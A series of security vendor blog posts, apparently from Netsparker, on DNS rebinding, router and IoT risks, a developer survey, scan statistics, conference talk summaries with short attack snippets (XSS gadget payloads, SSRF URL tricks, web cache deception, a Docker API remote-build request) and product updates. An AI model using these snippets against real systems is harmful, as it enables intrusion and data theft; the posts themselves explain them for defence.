  • Since storage space is often tight on routers, manufacturers often use old and probably vulnerable versions of software, as long as they serve the purpose.

In cases where a router's admin web portal is not available from the outside, attackers can use DNS rebinding to log into the router and hijack it. Such attacks are possible, though they are not scalable like the 2016 MIRAI malware infection, which infected thousands of home routers by using the default telnet password to gain admin access and add them to large botnets. Routers are typically hacked for a number of reasons; here are just a few:

  1. They can be used for Distributed Denial of Service (DDoS) attacks.
  2. Attackers can use them in a Man In The Middle attack (MITM) to intercept the traffic that passes through them.
  3. Attackers use them as a foothold to gain access to other machines on the router's network, like what happened with the NotPetya ransomware in June 2017.

IOT Devices - Many of Which Are Insecure


MIRAI did not only target home routers; other victims included IP cameras and digital video recorders. More often than not, security does not play an important role in the design of Internet of Things (IOT) devices, and we install such insecure products on our home and corporate networks.

To make things worse, many people who do not have IT security experience tend to disable all firewalls and other security services to make IOT devices, such as an IP camera, available over the internet. These types of setups can have unpredictable outcomes for the security of the devices connected to our networks, and can be an open invitation for attackers to target other parts of our systems.

Vulnerable NAS Servers

NAS servers have become very common nowadays. They are used to manage and share files across all the devices on a network. Like almost any other device, NAS servers can be configured via a web interface, from which users are, for example, allowed to download files.

NAS servers are also an additional attack surface. Similar to what we explained above, an attacker can use CSRF or a DNS rebinding attack to interact with the web interface. Since these web interfaces typically have root access, to allow the user to change ports and so on, once an attacker gains access he can easily compromise the whole server.

Vulnerable Services Typically Used By Developers

Misconfigured MongoDB Services


Even on the rare occasion that a MongoDB instance is properly set up to bind to localhost instead of 0.0.0.0, it can still be vulnerable to attacks through its REST API. The REST API is typically enabled because it is a useful feature for frontend developers: it allows them to have their own test datasets without having to rely on a finished backend. The data is returned in JSON format and can therefore be used with native JavaScript functions.

However, this web interface has some serious flaws, like CSRF vulnerabilities, that can lead to data theft, as described in this proof of concept of a CSRF attack on the MongoDB REST API. In short, we used an OOB (out-of-band) technique to exfiltrate the data over DNS queries. The API is marked as deprecated; however, it was still present in the latest version we tested at the time we wrote the article.

Dropbox Information Disclosure


Another rather interesting vulnerability is the one we found in the Dropbox client for Windows. In order to communicate with the client, the website dropbox.com sends commands to a websocket server listening on localhost.

However, by default websockets allow anyone to send and receive data, even when the request originates from another website. Therefore, the Dropbox client uses a handshake to verify the sender's origin.

The handshake consisted of a check of a nonce, a string of characters known only to Dropbox and the client. It was queried directly from the Dropbox server, and there was probably a check for the Origin header. This means that a connection could take place, but no data could be sent from localhost if the origin was not correct.

However, when any random website connected to the websocket server on localhost, the Dropbox client would prematurely send a handshake request. The handshake request included information such as the ID of that particular request, which OS was in use, and the exact version of the Dropbox application. Such information should not be leaked through such a channel, especially since it could be read by any third party website just by starting a connection request to the server on localhost.

Note: The issue was responsibly reported to Dropbox via HackerOne. It was immediately triaged and awarded an initial bounty, as well as a bonus, since the report helped them find another issue.

How Can You Prevent These Types of Attacks?

Simply put, to prevent DNS rebinding attacks at the web server level, just block access when the Host header in the HTTP request does not match a whitelist. Below is an explanation of how you can do this on the Apache and IIS web servers.

Blocking DNS Rebinding Attacks on Apache Server

On Apache you can block access if the Host header does not match 127.0.0.1 with mod_authz_core, by adding these lines to your configuration:

<If "%{HTTP_HOST} != '127.0.0.1'">
    Require all denied
</If>

Therefore, if someone tries to launch a DNS rebinding attack, the request will be blocked and the server will return an HTTP 403 response.

Blocking DNS Rebinding Attacks on Windows IIS

It is very easy to block DNS rebinding attacks on the Microsoft IIS web server. All you need to do is add a rule of type “Request blocking” in the URL rewrite menu with the following options:

  • The “Block access based on” field has to be set to “Host header”.
  • The “Block request that” field has to be set to “Does Not Match the Pattern”. One or more host headers can be used as the pattern (source).

Other Measures to Block Such Type of Attacks

Another good countermeasure is to block third party cookies in the browser, and to use the SameSite attribute on cookies in the web application that is being developed.
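As a sketch of what this looks like in practice: the cookie name and value below are placeholders, and since PHP's setcookie() had no SameSite option at the time of writing, the raw header is set directly:

<?php
// Browsers will not attach a SameSite=Lax cookie to most cross-site requests,
// which blunts CSRF-style attacks that rely on ambient cookies.
header('Set-Cookie: session=abc123; Path=/; HttpOnly; SameSite=Lax');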

Other than that, apply the same security measures to internal websites as if they were publicly available. The web application should not be vulnerable to CSRF, cross-site scripting, SQL injection or other types of web vulnerabilities, in order to guarantee a safe testing environment.

As an additional security measure, run the web application in a virtual machine. Even though this is often not necessary, and complicates matters, it can lessen the impact of a compromise. This setup is mostly recommended for security researchers who want to run vulnerable web applications on their machine.

Netsparker is now an accredited supplier on the UK Government’s Digital Marketplace



We are pleased to announce that Netsparker Cloud, our enterprise web application scanner, has been accepted and listed on the UK Digital Marketplace. To gain a place on the UK Digital Marketplace, Netsparker Cloud had to adhere to a number of high-level requirements under the G-Cloud 9 framework, proving that Netsparker is an effective web application security scanner.

With the use of cloud-based computing becoming increasingly commonplace in the UK public sector, having Netsparker Cloud listed on the UK Digital Marketplace has never been more important, as it enables us to support all branches of the UK government with our easy to use, cutting-edge web application vulnerability scanner. And if Netsparker is fit to be used by the agencies of the UK government, businesses can trust and use it too.

For more information about the UK Digital Marketplace, visit their website. To easily perform automated web application security scans of your websites and web applications with Netsparker Cloud, sign up for the free Netsparker Cloud trial available on our website.

Visit Netsparker at OWASP AppSec USA 2017 in Orlando



Netsparker is sponsoring and exhibiting at the OWASP AppSec USA 2017 Conference, which will be held on the 21st and 22nd of September at Disney's Coronado Springs Resort in Orlando, Florida.

Come and visit us at booth P8 in the exhibitors' hall and let's talk about web application security and the benefits of automating the process of identifying vulnerabilities in your web applications and web services. We will also have some of our popular swag, so to avoid disappointment, come and say hello as early as possible.

For more information about the conference visit the official OWASP AppSec USA Conference website.

Get a $100 Discount on the OWASP Appsec USA Conference Ticket

Use the discount code UNLM100NTSPKR when buying your OWASP AppSec USA Conference ticket to get a $100 discount.


Netsparker Survey Results | Web Developers on Web Application Security, Governments, Most Vulnerable Industries & More


A few weeks ago one of our security researchers was experimenting with DNS rebinding exploitation. Using this attack method, he managed to attack vulnerable web applications hosted behind a firewall, practically bypassing the network firewall.

It is a very interesting attack and you can read Vulnerable Web Applications on Developers Computers Allow Hackers to Bypass Corporate Firewalls to learn more about this subject. Our researcher Sven also gave a live demo of how to bypass firewalls by exploiting vulnerabilities in web applications.

This attack method got us thinking about how many businesses are vulnerable to this type of attack; after all, almost every developer and security researcher has a half developed or vulnerable web application running in a test environment. With that in mind, and with all the hacking and election hacking news out there, we thought of doing a survey and asking developers some questions, which would hopefully give us a better insight into how vulnerable corporations are, and who the biggest target is.

Web Developers Demographics

Before diving into the interesting numbers, let's start with some demographics on the web developers who took the survey.

Age of Web Developers

Survey Results - What is your age?

Gender of Web Developers

Survey Results - What is your gender?

Employment status of Web Developers

Survey Results - What is your current employment status?

Industry Sector the Web Developers Work in

Survey Results - Which of the following best represents your job function?

Web Developers Survey Questions

This is where the interesting stuff starts. Let's start with the obvious question:

Do you run a web server (LAMPP / XAMPP / IIS etc.) on your computer or test environment?


This is somewhat surprising to me. To be honest, I expected that 99% of all developers would have some sort of web server configuration running on their computer or test environment.

Would you say that you typically keep your web server up-to-date?


It is good to see that 89.1% of the web developers we surveyed keep their web server software up to date. This is not surprising, because as an industry we have really improved when it comes to patch management and network security.

Which of the following, if any, would you say are true of your test environment? (Select all that apply.)


Now this is where it really starts becoming interesting, or even scary. More than half of the web developers who took the survey admit that they sometimes run half-developed and possibly vulnerable web applications on their computers. This is not bad, and kind of expected. What is really scary is that 55.4% of them have connected such computers directly to the internet. That makes them a perfect, easy target, even for a script kiddie!

The above also means that, on average, one in two businesses is vulnerable to the attacks we mentioned earlier, so should attackers do some homework and target them, they can bypass the victim's corporate firewall and strike gold.

Which of the following vulnerabilities, if any, put democratic governments most at risk of an election hacking? (Select all that apply.)


So much has been said about the possibility of tampering with elections, but not much has been said about what could actually allow intruders to tamper with the process. The majority of the web developers we surveyed think that the top three problems are a lack of IT expertise, outdated and possibly insecure polling equipment, and politicians who do not believe this is a problem. The latter is true, and it is frustrating to see politicians living in their own cocoon, denying such things.

Which of the following preparations, if any, should democratic governments undergo in order to secure themselves against an election hacking? (Select all that apply.)


Which of the following concerns, if any, do you think prevent corporate boardrooms from taking cybersecurity seriously? (Select all that apply.)


It is very interesting to see that 57.4% of the web developers said that their management does not really understand IT. This clearly shows that even though someone might have good managerial skills, it does not necessarily mean he is good at managing IT operations and departments. From my own personal experience, nothing beats hands-on experience, and there is no better manager than one who has worked in the field himself.

Which of the following actions, if any, should companies take in the event of a data breach? (Select all that apply.)


It might be a small percentage, but it is quite worrying that 6.9% of the developers who participated in the survey believe that companies should try to cover up hack attacks.

Which of the following industries, if any, do you think are most vulnerable to hacking? (Select all that apply.)


Which of the following recent hacks, if any, do you think has been the most innovative? (Select all that apply.)


Which of the following technologies, if any, do you think are most at risk of future hacking for the rest of 2017? (Select all that apply.)


What Have We Learnt from this Survey?

We kind of expected such results, but as always, there is a lot to take away from this survey. Here is a recap of what we’ve learnt:

  • More than half of web developers run some sort of incomplete and possibly vulnerable web application. That means that more than half of businesses are possibly vulnerable to some sort of attack.
  • Governments and political parties are the biggest target (political reasons / hacktivism etc) and they need to step up their game when it comes to cybersecurity.
  • People in management should definitely get more involved and better inform themselves.
  • Always contact law enforcement and assess the type of threat; if need be, hire specialised IT forensics experts in case your business is hacked. Never try to cover it up. If you try to do so to save the business' reputation, it might, and most probably will, backfire.
  • After governments, web developers think (and they are right) that the most targeted industries are financial services, media, healthcare and manufacturing.
  • Smart home technology (IoT), web applications and services and connected cars will be the most targeted in the future.

Infographic: Statistics About the Security State of 104 Open Source Web Applications


Every year we publish a number of statistics about the vulnerabilities that the Netsparker web application security scanner automatically identified in open source web applications. Netsparker is a heuristic web application security scanner, so all these vulnerabilities were identified heuristically, not with signatures. Here are the numbers for the scans and research we did in 2016.

Why Do We Use Open Source Web Applications for Testing?

We use open source web applications to test our dead accurate web vulnerability scanning technology because of their diversity. You can find any type of web application you can dream of in the open source community: forums, blogs, shopping carts, social network platforms and more. You can also find applications written in almost every development language available, such as PHP, Java, Ruby on Rails and ASP.NET. In fact, in 2016 we further diversified our test lab and included more web applications built with NodeJS, Python and similar frameworks.

The other reason why we use open source web applications is that, while doing the testing, we can give something back to the community. By scanning these web applications and reporting the 0-day vulnerabilities back to the developers, we are helping open source developers write more secure code.

In fact, we are so committed to helping open source project developers that we are also giving free Netsparker Cloud accounts to all open source web developers.

Open Source Web Applications, Vulnerabilities & Numbers for 2016

How Many Web Applications and Vulnerabilities?

In 2016 we scanned 104 web applications and identified 129 vulnerabilities in 31 of them. Therefore 29.8% of the scanned web applications had one or more web application vulnerabilities in them.
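
If you want to double-check that percentage, the arithmetic is trivial (a throwaway Python snippet for illustration only, not part of any Netsparker tooling):

    # 31 of the 104 scanned applications had at least one vulnerability.
    vulnerable, scanned = 31, 104
    print(round(100 * vulnerable / scanned, 1))  # 29.8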

How Many 0-Day Vulnerabilities Did Netsparker Identify?

During our test scans in 2016, we identified 31 0-day vulnerabilities and published 27 advisories, 6 of which were published in 2017. We do not always publish an advisory; unfortunately, there are sometimes factors that prevent us from doing so.

What About the Other Vulnerabilities?

The other 98 vulnerabilities that the Netsparker web vulnerability scanner identified were known vulnerabilities that had not yet been fixed. We keep a record of these vulnerabilities for two reasons:

  1. To measure the effectiveness of the automated scanner: if there are known vulnerabilities that the scanner does not identify, it means we are not doing a good enough job. The good news is that Netsparker not only identified all the known vulnerabilities, but also uncovered 31 0-days.
  2. Even though these are known vulnerabilities, they have not been fixed in the latest version of the software in question, so anyone installing these web applications will be vulnerable.

Are We Seeing More Secure Web Applications?

In both 2015 and 2016, we published fewer advisories than we did in 2014. Does that mean that we are seeing more secure web applications? The answer is both yes and no.

Yes, because some of the web application projects that have been around for years are becoming more secure. Their developers have more experience and are learning from the community. WordPress is a perfect example of this; the WordPress core is very secure.

At the same time, new open source web applications are being released almost daily, and even though it is not a certainty, the chances of a newly developed web application having a vulnerability are very high. So there will always be a good number of vulnerable web applications out there.

Trivia: 26 of the scanned web applications were WordPress plugins, 8 of which had vulnerabilities.

Most Common Web Application Vulnerabilities in Open Source Web Applications for 2016

Which were the most commonly identified web application vulnerabilities in the open source web applications we scanned? Here are the numbers:

The top two culprits are Cross-site Scripting and SQL Injection vulnerabilities, with XSS accounting for a staggering 81.9% of the identified vulnerabilities. This is not unusual; last year we had similar results, with 180 XSS and 55 SQL Injection vulnerabilities.

Web Security Automation is the Key

According to the above numbers, a vulnerable web application had, on average, 4.2 vulnerabilities (129 vulnerabilities across the 31 vulnerable applications). Malicious hackers are definitely happy with the a la carte selection of vulnerabilities they have at their disposal.

This is somewhat expected, considering the average modern web application has hundreds, if not thousands, of possible entry points. Web applications are becoming really complex, and unless you automate security, it is impossible to develop a secure web application. Some people might not agree, but how can you, as a web application developer, manually check that every possible entry point in your web application is not vulnerable to hundreds of different vulnerability variants?

You definitely cannot, and automation is the key here. That’s what we are focusing on at Netsparker. We are not just developing a scanner; we are developing a web application security solution that generates dead accurate web security scan results, so you do not have to waste time manually verifying the findings.

Free Web Application Security Scans for Open Source Projects

Take advantage of our offer and build more secure web applications. As an open source developer, you can get a free Netsparker Cloud account and automatically scan your open source web applications for vulnerabilities. Some open source projects, such as OpenCart, are already benefiting from free web application security scans.

Missed Black Hat or DEF CON? We've got you covered

I'm sure lots of you are sad that Black Hat USA 2017 and DEF CON 25 are over. You had a hell of a time in Las Vegas, were given the opportunity to listen to some great talks and meet people who share the same interests. And of course, you learned a lot and attended many great workshops. If one or more of these points apply to you, this article is probably not interesting for you.

You will find this article interesting if:

  • Everybody told you that you need to bring a dedicated travel phone when you pass through customs; however, the same people called you an idiot for planning to get a burner phone for Black Hat. Out of confusion, you just stayed at home.
  • All you wanted was to see the great talks at DEF CON, but it got cancelled yet again!
  • You passed out at the bar when the cons started and woke up to people carrying their IMSI catchers out of the hotel at the end of DEF CON. Nothing to see here.
  • Your husband, wife or partner made you sleep on the couch until the end of the conferences because you suggested flying a few thousand miles to Sin City and leaving them alone at home with the kids.

Or in other words: you couldn't attend. In all of those cases, you were probably interested in seeing the awesome talks. Now I have good news and bad news for you. The bad news first: there are no videos yet. Yes, both conferences will make videos of the talks available over the course of the following months. However, for now, all you can get are shaky three-minute clips of one-hour presentations and short PoC videos you won't understand if you didn't see the talk.

Now the good news: there are slides available. Yes, we've sifted through hours' worth of "What if I told you?" memes and countless pages with the same diagram but different arrows, and we've come up with a list of our favorite slides and papers concerning web application security.

JSON attacks by Alvaro Muñoz and Oleksandr Mirosh

First slide/page of our favorite talks in DEF CON 25/Black Hat USA - JSON attacks by Alvaro Muñoz and Oleksandr Mirosh

We've heard it countless times in recent years: don't use dangerous deserialization functions on user input; just use JSON instead. Let's just say this didn't work out too well. Thanks to these slides you'll see why JSON deserialization is not a good idea either. An absolute must-read if you are a developer or a hacker.

Game of Chromes by Tomer Cohen

First slide/page of our favorite talks in DEF CON 25/Black Hat USA - Game of Chromes by Tomer Cohen

Do you keep track of all the extensions you have installed? You probably have a weather widget next to the URL bar, an extension that replaces every occurrence of "APT" with "16 year old hacker" and hopefully an Ad Blocker. However, after reading this paper you'll probably strip them down to a minimum. You'll probably also spend the rest of the day scrolling through your Facebook messages, just to see if a malicious plugin sent a message to some guy you haven't talked to for three years, asking him if he would like to install the coolest Chrome extension you've seen in a while. Awkward.

Summary

  • A malicious Chrome extension was spreading through Facebook messages
  • It was a copy of a legitimate extension in the Chrome Web Store
  • It loaded a script over the internet and injected it into every single page
  • It created Wix pages that redirected to the attacker's website
  • At a later stage, it used the victim's Facebook account for social logins to Wix to avoid bot detection

Abusing Certificate Transparency by Hanno Böck

First slide/page of our favorite talks in DEF CON 25/Black Hat USA - Abusing Certificate Transparency by Hanno Böck

A modern web without TLS? Not gonna happen. That's why we are amongst the proud sponsors of the Let's Encrypt certificate authority. One particularly useful approach to further secure TLS is the Certificate Transparency log: whenever a new certificate is created, it can be submitted there for anyone to see. So no need to disable zone transfers anymore, yay! *cough*. In the future, certificates that aren't in the log won't be accepted by browsers like Google Chrome. These Certificate Transparency logs are public, and Hanno Böck shows you how attackers can abuse this fact to automatically take over web servers by using install scripts before the user can. But don't worry, he'll also show you how to avoid that effectively.

Summary

  • He uses crt.sh to find (sub)domains that have just been issued an SSL certificate (see the sketch after this list)
  • He then checks if there's an install script, e.g. for WordPress
  • If there is one, he completes the installation using his own database and plants a backdoor script on the server
  • After that, he reverts all the changes he made, presenting the user with a fresh install script again; however, it still contains the backdoor
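
If you want to experiment with the first step yourself, crt.sh exposes a JSON output mode that can be polled for newly logged certificates. Here is a minimal sketch in Python (example.com is a placeholder domain, and the exact output format of crt.sh may change):

    import requests

    # Query crt.sh for certificates logged for a domain and its subdomains.
    # The %. prefix acts as a wildcard; example.com is a placeholder.
    resp = requests.get(
        "https://crt.sh/",
        params={"q": "%.example.com", "output": "json"},
    )

    for entry in resp.json():
        # name_value holds the certificate's (sub)domain names, not_before
        # the issuance date -- the freshly issued entries are the ones an
        # attacker would race to, looking for unfinished install scripts.
        print(entry["not_before"], entry["name_value"])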

Driving down the rabbit hole by Jesse Michael, Mickey Shkatov and Oleksandr Bazhaniuk

First slide/page of our favorite talks in DEF CON 25/Black Hat USA - Driving down the rabbit hole by Jesse Michael, Mickey Shkatov and Oleksandr Bazhaniuk

Alright, you found it out. This one is not purely about web applications. However, it should serve as a quick reminder that you should regularly check that the services you rely on are still up and running, and that their domain names are not for sale. In this case, it was enough to run `strings` on some debug files to find an expired domain belonging to Nissan. After the researchers registered it, they received some interesting data via POST requests: not only usernames and passwords but also location data showing where the vehicles were driving. On a map, they showed that one car seemed to have driven into the Delaware River. Let's just hope this had nothing to do with their research.

Summary

  • They got the complete dashboard of a wrecked Nissan
  • Could obtain navigation system debug data from it
  • They ran strings on the debug files and found the following URL:
    http://biz.nissan-gev.com/WARCondelivbas/it-m_gw10/
  • Since the domain had expired, they registered it and received POST requests containing location data from different cars.

A new era of SSRF by Orange Tsai

First slide/page of our favorite talks in DEF CON 25/Black Hat USA - A new era of SSRF by Orange Tsai

One of my personal favorites this year. If you've ever written a vulnerability-free, RFC-conformant URL parser, you are probably someone with an infinite amount of time and wisdom on your hands. But we mere humans have to rely on the parsers that come with the respective programming language or - even worse - on external libraries. However, it turns out that even the developers of those external parsers are human beings like you and me and make mistakes as well. The author shows how weirdly the URL parsers of those libraries behave, why CRLF injection is not only a server-side problem, and even implies that he has at least 3 bypasses for the SSRF protection in WordPress. I, for one, look forward to seeing the video of the presentation.

Summary

  • He uses @, #, &, spaces etc. to fool parsers into checking the wrong host name (a minimal illustration follows this list)
  • Using HTTPS, he shows how to use spaces and CRLF to craft valid SMTP requests
  • He also shows how to abuse the full-width Latin capital letter N (U+FF2E) to bypass filters in Node.js
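
To get a feel for the first trick, here is a minimal, self-contained illustration of how a naive allow-list check and a real URL parser can disagree about the host (trusted.com and attacker.com are placeholder domains):

    from urllib.parse import urlsplit

    def naive_is_safe(url):
        # Naive allow-list check: just looks for the trusted host
        # somewhere in the authority part of the URL.
        return "trusted.com" in urlsplit(url).netloc

    # Everything before the @ is userinfo, so the real host is attacker.com.
    url = "http://trusted.com@attacker.com/"

    print(naive_is_safe(url))      # True -- the naive filter is fooled
    print(urlsplit(url).hostname)  # attacker.com -- where the request goes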

Web Cache Deception attack by Omer Gil

First slide/page of our favorite talks in DEF CON 25/Black Hat USA - Web Cache Deception attack by Omer Gil

Okay okay, right at the beginning of this article I told you that we would scroll through all the articles with the same pictures but different arrows for you. But that's what you'll find within these slides. However, if you click through exactly 28 pictures of what I assume is the same dog, you'll end up on slide 25. This is where the author describes an awesome attack technique that takes advantage of a common (mis)configuration of caching servers together with the behaviour of some web application programming languages and frameworks. So if you like dogs (and let's be honest, who doesn't?) and want to read about cool new attack methods (and let's be honest, who doesn't?) then you shouldn't miss this article. However, if you don't like dogs but are into cool new attack methods anyway, you can just read the white paper.

Summary

  • To exploit this vulnerability, you must be able to append a file extension that a misconfigured intermediate proxy caches by default, e.g. /index.php/file.css
  • After that, you have to make a victim visit the page
  • The response will be cached by the intermediate proxy and, once you open the same URL in your browser, you will see the victim's cached response, as sketched below.
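
As a rough sketch of that flow, assuming a hypothetical example.com application and a proxy that caches purely by file extension:

    import requests

    # Hypothetical target: /account.php returns the victim's private data,
    # and a misconfigured intermediate proxy caches anything ending in .css.
    url = "https://example.com/account.php/nonexistent.css"

    # Step 1: the authenticated victim is lured into opening the crafted URL;
    # the proxy caches the personalised response because of the extension.
    requests.get(url, cookies={"session": "victim-session-id"})

    # Step 2: the attacker fetches the same URL without any credentials and
    # receives the victim's cached page.
    print(requests.get(url).text)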

Bypassing XSS Mitigations via script gadgets by Sebastian Lekies, Krzysztof Kotowicz and Eduardo Vela Nava

First slide/page of our favorite talks in DEF CON 25/Black Hat USA - Bypassing XSS Mitigations via script gadgets by Sebastian Lekies, Krzysztof Kotowicz and Eduardo Vela Nava

Ah yes, the famous blacklist filters. If you like XSS and challenges, you should try to bypass one. More often than not it's pretty easy. Some of them block certain keywords like 'iframe' or 'document', some literally have a regex pattern like <script>.*</script>, and others try to prevent exploitation by blacklisting 'alert'. Way to go. But the authors don't seem to be interested in the easy ones. Instead, they are trying to fool strict filters with harmless tags and attributes that become dangerous thanks to existing code on the vulnerable pages. How probable it is to find existing gadgets and how easy it is to exploit them is explained in the slides.

Summary

  • By abusing the fact that some JavaScript libraries use HTML attributes to evaluate or modify data on the page, you can bypass blacklist filters.
  • Knockout: <div data-bind="value:'alert(1)'"></div>
  • Ajaxify: <div class="document-script">alert(1)</div>
  • Bootstrap: <div data-toggle=tooltip data-html=true title='<script>alert(1)</script>'>

How abusing Docker api led to remote code execution by Michael Cherny and Sagie Dulce

First slide/page of our favorite talks in DEF CON 25/Black Hat USA - How abusing Docker api led to remote code execution by Michael Cherny and Sagie Dulce

Did you know how easy it is to abuse internal services using DNS rebinding? Or how dangerous enabled REST APIs are, even if they are only reachable on localhost? If not, you a) need to be strong now, and b) should read our blog post on how hackers can use vulnerable web applications to bypass corporate firewalls.

In this presentation, the authors explain how it is possible to get remote code execution by using the Docker REST API if it is enabled. And it seems like this is pretty common. So if you run a Docker container, make sure to disable the API and read the linked paper.

Summary

  • They abused the REST API on port 2375
  • Since it binds to localhost by default, either CSRF or SSRF is required for exploitation
  • The vulnerable endpoint is localhost:2375/build
  • A POST request to the following URL will create a Docker container from a GitHub repository and use the same network as the host machine (see the sketch after this list):
    http://localhost:2375/build?remote=https://github.com/<user>/<repository>&networkmode=host
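
Schematically, that request boils down to a single POST; in the actual attack it would be triggered indirectly via CSRF or SSRF, since the API listens on localhost. The <user>/<repository> placeholders are kept from the slide:

    import requests

    # Build a container from an attacker-controlled repository and attach it
    # to the host network; <user>/<repository> are placeholders.
    build_url = (
        "http://localhost:2375/build"
        "?remote=https://github.com/<user>/<repository>"
        "&networkmode=host"
    )
    resp = requests.post(build_url)
    print(resp.status_code)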

That’s All from Black Hat and DEF CON, Folks!

Those were our favorite talks from this year's DEF CON 25 and Black Hat USA conferences. We are looking forward to seeing the videos of all the talks and hope you enjoyed the slides as much as we did. It's time to leave the couch now and buy some flowers for your better half.

August 2017 Update of Netsparker Desktop

We are now less than one month away from autumn, so today we are announcing the end-of-summer update of Netsparker Desktop. Here is an overview of what is new and improved in this update of our dead accurate web application security scanner.

Support for Multiple Credentials for Different URLs & Authentication Mechanisms

Do you have a web application with different password-protected areas that use different authentication mechanisms? From this version onwards, you can configure all the different sets of credentials and authentication mechanisms in Netsparker, so you can scan all sections of the web application in one web vulnerability scan.

How does it work? Simple! When configuring authentication you have to specify the:

  1. Authentication mechanism (NTLM, Basic, Digest, Kerberos)
  2. Credentials
  3. URL of the login form or password-protected section

You can read more about this new feature in Configuring Basic, NTLM, Kerberos authentication in Netsparker Web Application Security Scanner.

New Security Checks

We have also added a number of new security checks for Microsoft’s IIS web server and WordPress, as well as a Remote Code Execution check for Node.js on Windows.

Improved Security Checks and Functionality

In this update of Netsparker Desktop, we also improved a number of existing security checks.

We have also improved the DOM/JavaScript simulations and the performance of a number of security checks and other components in the scanner.

Complete List of What is New, Improved & Fixed

For a complete list of what is new, improved and fixed in the latest version of Netsparker Desktop please refer to the web vulnerability scanner’s changelog.

Configuring Basic, NTLM & Digest Authentication in Netsparker

There are two main ways to password protect a section of a web application, or the whole application. You can use form-based authentication, which is done at the web application level, or you can configure the authentication at the web server level using Basic, Digest or NTLM/Kerberos authentication.

This blog post explains how you can configure the credentials in the Netsparker web application security scanner to scan a web application that is password protected with Basic, Digest or NTLM/Kerberos authentication.

Configuring the Credentials & URLs

Configuring Multiple Sets of Credentials and URLs

You can configure the authentication details in Netsparker from the Authentication > Basic, NTLM/Kerberos node in the Start a New Website or Web Service Scan dialogue, which is shown in the above screenshot.

When configuring the authentication details you have to specify the:

  • Authentication type (Basic, NTLM, Kerberos, Digest, Negotiate)
  • URL Prefix (the URL of the password protected section)
  • Username & password
  • Domain (optional; needed only when a domain is required in Windows environments)

Once you configure the authentication details, use the Test Credentials button to verify the credentials before launching the scan.

Note: Enable the option Do not expect challenge if you want the scanner to send the authorization header for basic authentication without expecting a challenge.
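
For context, "not expecting a challenge" simply means sending the Authorization header preemptively, instead of first waiting for a 401 response from the server. A minimal sketch of the same behaviour in Python (the URL and credentials are placeholders):

    import base64
    import requests

    # Preemptive basic authentication: attach the Authorization header to the
    # first request rather than waiting for a 401 challenge.
    token = base64.b64encode(b"username:password").decode()
    resp = requests.get(
        "https://example.com/basic/",
        headers={"Authorization": f"Basic {token}"},
    )
    print(resp.status_code)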

Configuring Multiple Sets of Credentials and URLs

The URL prefix is used to specify the URL of the password-protected area. This is particularly useful if you have multiple different password-protected areas on the target web application. For example, imagine you have a website http://example.com/ where basic authentication is used to protect the pages under http://example.com/basic/ and NTLM authentication is used to protect the pages under http://example.com/ntlm/. In such a case, you can configure the following:

Configuring Multiple Sets of Credentials and URLs

Upgrading from Older Versions of Netsparker Desktop

Support for multiple sets of credentials was introduced in Netsparker 4.9.1. If you are updating from an older version of Netsparker and have configured credentials:

  1. All saved credentials without a configured domain will be migrated to Basic authentication,
  2. All saved credentials which have a domain configured will be migrated to NTLM authentication.

ProfitKeeper Automates Web Application Security with Netsparker

“We were impressed by the amount of positive feedback from your existing customers and also the calibre of the companies who were already using Netsparker.”

Who can tell it better than the customer himself? This is not an ordinary case study; it is an interview with Tom Mallory, ProfitKeeper’s IT Ninja. In this interview, Mr Mallory explains why he chose the Netsparker Web Application Security Scanner and how it helped him improve the security posture of the web applications that he manages.

What Can You Tell Us About ProfitKeeper and Your Role?

When you wear as many hats as I do, I think the only option is to refer to yourself as an IT Ninja. Right?

ProfitKeeper has been in business for over 13 years, teaming up with franchisors to help them increase their profits. Although we provide services to very large, established franchises, we pride ourselves on individualized attention to all our partners, no matter the size.

From a technical standpoint, we’re in the Finance/Analytics industry because that is the type of data we’re working with. But we’re also in the customer service business in the sense that we have clients/customers who trust and rely upon not only the data we provide them but also our ability to keep that data safe.

Can you tell us a bit about your web environment and applications?

Our web applications are built with .NET. They run on Microsoft’s IIS web server and use Microsoft SQL Server as the database backend. We currently manage three web applications that are responsible for generating data surrounding KPIs, royalty reporting, business accounting and payroll.

What Made You Decide to Try Netsparker Web Application Security Scanner?

We have been using Netsparker for about one year now. It’s essentially the first time that we’ve relied upon a third-party automated web application security scanner to perform a thorough penetration test.

A major point of attraction, at least initially, was the number of positive reviews. We were impressed by the amount of positive feedback from your existing customers and also the calibre of the companies who were already using Netsparker.

Once we dove into using Netsparker (which right now is about once per week) we were impressed by the ease of setup and ongoing use. I wish I could comment on support but we haven’t really had any issues to speak of.

Believe it or not, in the years prior to using Netsparker we were performing all of our testing manually. You don’t really realize how much time and effort an automated web application security scanner can save you until you try it. Moving back to a manual process seems unfathomable at this point in time.

A large part of our decision to begin using Netsparker came from our long-term acknowledgement that we need to do everything in our power to ensure that our clients’ data is safe and secure.

With both personally identifiable information and financials being at risk, we already understood the importance of continually minimizing the ways in which a malicious hacker could access critical information.

How Has Netsparker Helped to Reduce Security Vulnerabilities?

As you know, performing manual penetration testing is an arduous process. Netsparker not only makes us faster but also better. Netsparker, and the automation it provides, has allowed us to make our processes as efficient as possible while building more secure web applications.

One feature we really like, which also helped us significantly reduce the probability of human error, is the Proof-Based Scanning Technology, which automatically verifies the identified vulnerabilities. That’s a lifesaver for me, because I do not need to know how to reproduce every vulnerability that’s out there.

As regards the findings in our web applications, although we found our code to be free of vulnerabilities, Netsparker helped to confirm this, in addition to allowing us to find areas of code that had the potential to cause security issues such as SQL Injection vulnerabilities.

An often overlooked benefit of Netsparker: It makes you more aware of areas that present the potential for security vulnerabilities.

Would you like to add anything else?

Netsparker was extremely easy to set up and use, but provided world-class information on potential web application vulnerabilities that, if exploited, could cost us our company.

Live Demo of How to Bypass Web Application Firewalls & Filters

Many assume that a web application firewall is enough to protect web applications from malicious attacks, and that fixing security vulnerabilities is therefore not necessary thanks to the WAF’s blacklist of functions, keywords or characters. However, expectations are very different from reality.

Watch episode 526 of Paul’s Security Weekly during which our security researcher Sven busts the myths and demos how attackers can bypass web application firewalls and all kinds of blacklist filters to attack and exploit security holes in vulnerable websites. In his demo Sven shows how to:

  • Bypass Cross-site Scripting, Command Injection and Code Evaluation filters that were meant to protect your web applications
  • Avoid being caught by WAFs
  • Approach such security mechanisms in general.

During the demo, Sven also explains why it is not possible to have one payload that bypasses all filters, and why less is often more when it comes to bypassing such security mechanisms.


Risky Business Podcast Interviews Ferruh Mavituna on How to Find Vulnerabilities in More Than 1,000 Web Applications

Award-winning journalist Patrick Gray interviewed our CEO, Ferruh Mavituna, on how to find vulnerabilities in more than 1,000 web applications.

During the interview, Ferruh explains that once you publish a web application online – even if it is a very basic one – a hacker will find it within a few minutes. This highlights how important it is for enterprises to ensure that all of their web applications are secure.

